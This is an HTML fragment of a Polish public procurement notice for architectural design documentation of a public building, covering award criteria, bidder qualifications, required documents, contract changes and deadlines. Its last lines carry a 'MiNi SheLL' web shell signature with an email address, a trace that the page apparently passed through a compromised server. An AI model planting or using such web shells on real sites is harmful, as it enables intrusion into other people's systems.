class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1.	Wykonawca wykaże, iż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej jedno zamówienie na wykonanie dokumentacji projektowej budowy budynku użyteczności publicznej o powierzchni nie mniejszej niż 1500 m2.<br/>1.2.	Wykonawca wykaże, że w trakcie realizacji zamówienia dysponować będzie osobami legitymującymi się kwalifikacjami zawodowymi i doświadczeniem określonymi poniższej :<br/>Funkcja,uprawnienia,wykształcenie <br/>Minimalne kwalifikacje zawodowe - doświadczenie , Kwalifikacje zawodowe,Doświadczenie <br/> Uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej	Opracował jako projektant co najmniej jedną dokumentację projektową budowy budynku użyteczności publicznej o powierzchni nie mniejszej niż 1500 m2.<br/><br/> Uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej	Opracował jako projektant co najmniej jedną dokumentację projektową budowy budynku użyteczności publicznej o powierzchni nie mniejszej niż 1500 m2.<br/><br/>Osoba wskazana do pełnienia ww. funkcji powinna posiadać uprawnienia budowlane do projektowania zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane w specjalności właściwej do powierzonej funkcji lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniejszych przepisów oraz przynależność do właściwej okręgowej Izby Architektów. <br/>Zgodnie z obowiązującymi w Rzeczpospolitej Polskiej przepisami prawa krajowego, osoby nie posiadające obywatelstwa polskiego, na warunkach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz.65) oraz w ustawie z dnia 15 grudnia 2000r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2014 r. poz. 1946 z późn. zm.): <br/>- mogą ubiegać się i uzyskać decyzję w sprawie uznania kwalifikacji zawodowych w budownictwie, nabytych w państwach członkowskich UE oraz wpis do właściwej okręgowej Izby Architektów, po przeprowadzeniu postępowania przez właściwy organ samorządu zawodowego w Rzeczpospolitej Polskiej, <br/>- jeżeli posiadają kwalifikacje zawodowe inżyniera budownictwa i prowadzą zgodnie z prawem działalność w zakresie tego zawodu w innym niż Rzeczpospolita Polska państwie członkowskim UE, mają prawo do tymczasowego i okazjonalnego wykonywania zawodu inżyniera budownictwa, tj. do świadczenia usług transgranicznych, bez konieczności uznawania kwalifikacji zawodowych, po złożeniu pisemnego oświadczenia o zamiarze świadczenia danej usługi wraz z niezbędnymi dokumentami i uzyskaniu tymczasowego wpisu do właściwej okręgowej Izby Architektów; świadczenie usług transgranicznych podlega każdorazowo indywidualnej ocenie dokonywanej przez właściwy organ samorządu zawodowego w Rzeczpospolitej Polskiej.<br/>2.	Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń, określonych w Dziale VII pkt 4.1 SWZ, zgodnie z formułą ,,spełnia – nie spełnia”. <br/> Oceny spełniania warunków udziału w postępowaniu Zamawiający dokona na podstawie złożonych oświadczeń i dokumentów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie<br/>Wykonawcy/Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postepowania na podstawie art. 7 ust. 1 UOBN –<br/>Załącznik nr 6 do SWZ.<br/>2.Oświadczenie Wykonawcy dotyczące przynależności do grupy kapitałowej– zgodnie z Załącznikiem nr 4 do SWZ.<br/>Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do<br/>zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.<br/>W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w<br/>oświadczenie.<br/>3.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby w zakresie podstaw wykluczenia z postępowania – Załącznik nr 5<br/>do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. -wykaz usług wykonanych w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy (wykaz usług zgodnie z Załącznikiem nr 3a do SWZ). <br/> Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonanych wspólnie z innymi wykonawcami wykaz usług dotyczyć ma usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył. <br/>- wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zgodnie z Załącznikiem nr 3b do SWZ). <br/>2.Oświadczenie Wykonawcy/Podmiotu udostępniającego zasoby dotyczące spełnienia warunku udziału w postępowaniu – według<br/>Załącznika nr 2 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ewentualne pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy.<br/>Pełnomocnictwo winno być załączone do oferty w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, lub kopii<br/>poświadczonej elektronicznie przez notariusza kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>elektronicznym podpisem osobistym.<br/>2. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania zamawiający<br/>może zażądać od wykonawcy odpisu lub informacji z Krajowego Rejestru Sadowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa wyżej, jeśli zamawiający może je uzyskać za<br/>pomocą bezpłatnych ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów.<br/>W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z Wykonawców składa osobno w/w<br/>oświadczenie<br/>3. Zobowiązanie podmiotu trzeciego (załącznik obowiązkowy w przypadku, gdy Wykonawca powołuje się na zasoby innych<br/>podmiotów w celu wykazania spełniania warunków udziału w postępowaniu) – zgodnie z Załącznikiem nr 7 do SWZ lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasadami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Pełnomocnictwo winno zostać<br/>złożone w formie opisanej w pkt. 5.11 ppkt.1 ogłoszenia.<br/>2. W celu potwierdzenia braku podstaw wykluczenia z postępowania każdy z Wykonawców złoży osobno oświadczenie<br/>wymienione w pkt. 5.6. ogłoszenia.<br/>3. W celu potwierdzenia spełniania warunków udziału w postępowaniu każdy z Wykonawców złoży osobno dokumenty i<br/>oświadczenia wymienione w pkt. 5.7. ogłoszenia w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu<br/>4. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania,<br/>Zamawiający żąda od wykonawcy wspólnie ubiegającego się o udzielenie zamówienia dokumentu, o którym mowa w pkt.<br/>5.11. ppkt.1. ogłoszenia.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do<br/>realizacji których te zdolności są wymagane. Wówczas wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy.<br/>7.Zamawiający nie narzuca osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia kluczowych etapów realizacji zadania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Poza przypadkami wymienionymi w art. 455 ust. 1 pkt. 2) lit. b i c i 4) oraz ust. 2 ustawy Pzp, przewiduje się możliwość<br/>dokonania zmiany istotnych postanowień Umowy (U) w stosunku do treści złożonej oferty, na podstawie której dokonano<br/>wyboru Wykonawcy (wyk.) Poniższe postanowienia stanowią dopuszczalny katalog zmian, na które Zamawiający (Zam.)<br/>może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Zam. określa następujące<br/>warunki zmian istotnych postanowień zawartej U: 1.1. W związku z zawieszeniem realizacji prac projekt. przez Zam. z<br/>przyczyn niezależnych od Wyk.. 1.2.W przypadku wystąpienia nieprzewidywanych w momencie zawarcia niniejszej umowy<br/>kolizji z planowanymi lub równolegle prowadzonymi przez Zam. lub inne podmioty inwestycjami w zakresie niezbędnym do<br/>uniknięcia lub usunięcia tych kolizji 1.3.Wystąpieniem okoliczności których Zam. nie był w stanie przewidzieć pomimo<br/>zachowania należytej staranności.1.4.Inne przyczyny, za które nie odpowiada Wyk..2.Warunki zmiany w zakresie wysokości<br/>wynagrodzenia Wyk.2.1.Zam. określa następujące zasady zmiany U. w wypadku wystąpienia jednej z okoliczności<br/>wskazanych w art. 436 pkt 4 lit. b ustawy Pzp w zakresie wynagrodzenia należnego Wyk. w przypadku zmiany:2.1.1.stawki<br/>podatku od towarów i usług oraz podatku akcyzowego,2.1.2.wysokości minimalnego wynagrodzenia za pracę albo<br/>wysokości minimalnej stawki godz., ustalonych na podstawie ustawy z dnia 10.10.2002 r. o min. wynagrodzeniu za<br/>pracę,2.1.3.zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezp. społ. lub ubezp. zdrowotne, 2.1.4.zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 04.10.2018 r. o pracowniczych planach kapitałowych<br/>‒ jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wyk.<br/>2.2.Zmiana wys. wynagrodz. obowiązywać będzie od dnia wejścia w życie zmian o których mowa w pkt. 2.1. Zmiana określ.<br/>w 2.1.2, 2.1.3, 2.1.4. może być dokonana nie wcześniej niż po upływie 12 miesięcy od zawarcia umowy lub dokonania<br/>ostatniej zmiany ceny. 2.3.W wypadku zmiany, o której mowa w 2.1.1. wartość netto wynagrodzenia Wyk. nie zmieni się, a<br/>określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.2.4.W przypadku<br/>zmiany, o której mowa w pkt. 2.1.2 wynagrodzenie Wyk. ulegnie zmianie o wartość wzrostu całkowitego kosztu Wyk.<br/>wynikającego adekwatnie ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości<br/>aktualnie obowiązującego min. wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty<br/>wzrostu min. wynagrodzenia.2.5.W przypadku zmiany, o którym mowa w pkt. 2.1.3 wynagrodzenie Wyk. ulegnie adekwatnie<br/>zmianie o wartość wzrostu całkowitego kosztu Wyk., jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia<br/>tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na<br/>rzecz Zam.<br/>Cały zakres zmian został opisany w SWZ Rodz. XIX INFORMACJE DODATKOWE pkt.od 1 do 5.<br/>3.Dopuszczalne są również zmiany umowy oraz wprowadzenie nowych postanowień do umowy, które będą korzystne dla<br/>Zam., a które nie będą wykraczać poza treść oferty, na podstawie której dokonano wyboru Wyk., a zmiany nie będą istotne<br/>zgodnie z zapisami art. 454 ustawy Pzp.<br/>4.Ustala się, iż nie stanowi zmiany umowy w rozumieniu art. 454 ustawy Pzp:4.1.Zmiana numeru rach. bank.;4.2.Zmiana<br/>danych teleadresowych.Zaistnienie okoliczności, o których mowa w niniejszym punkcie, wymaga jedynie niezwłocznego<br/>pisemnego zawiadomienia drugiej Strony.<br/>5.Zamawiający dopuszcza możliwość odstąpienia od umowy zgodnie z art. 456 ust. 1 pkt 1, 2 lit. a) i b) ustawy Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa https://platformazakupowa.pl/pn/lebork</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-19 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com